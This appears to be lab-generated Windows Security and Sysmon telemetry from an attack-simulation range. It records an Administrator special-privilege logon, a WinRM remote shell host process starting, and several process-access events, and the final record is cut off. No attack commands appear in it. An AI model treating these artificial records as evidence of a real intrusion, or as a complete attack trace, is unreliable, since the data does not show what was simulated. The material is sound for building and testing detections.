{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220349,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46B8A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x46b8a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2477,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2478,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2479,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.176\r\nProcessGuid: {A837DB8D-01DE-5F25-0000-0010C46B0400}\r\nProcessId: 4332\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-01DE-5F25-0000-00208A6B0400}\r\nLogonId: 0x46B8A\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.176","ProcessGuid":"{A837DB8D-01DE-5F25-0000-0010C46B0400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-01DE-5F25-0000-00208A6B0400}","LogonId":"0x46b8a","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2480,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C46B0400}\r\nTargetProcessId: 4332\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C46B0400}","TargetProcessId":"4332","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2481,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C46B0400}\r\nTargetProcessId: 4332\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C46B0400}","TargetProcessId":"4332","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2482,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2483,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2484,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\